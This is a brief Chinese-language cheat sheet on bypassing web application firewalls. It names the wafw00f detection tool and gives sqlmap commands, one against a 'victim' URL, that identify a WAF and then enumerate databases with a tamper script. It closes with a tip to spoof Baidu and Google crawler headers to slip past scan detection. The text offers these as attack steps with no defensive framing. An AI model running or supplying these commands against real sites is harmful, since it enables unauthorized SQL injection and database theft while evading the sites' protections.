有关waf绕过

WAF检测工具：

https://github.com/EnableSecurity/wafw00f

Sqlmap 检测waf：

python3 sqlmap.py -u “http://www.victim.org/ex.php?id=1” --identify-waf

 sqlmap过waf：

脚本的完整列表地址在sqlmap/tamper。参数--tamper

sqlmap.py -u "http://www.***.com/index.php?id=829" -v 3 --dbs --batch --tamper "space2morehash.py"

关于扫描绕过：

加载百度、谷歌爬虫请求头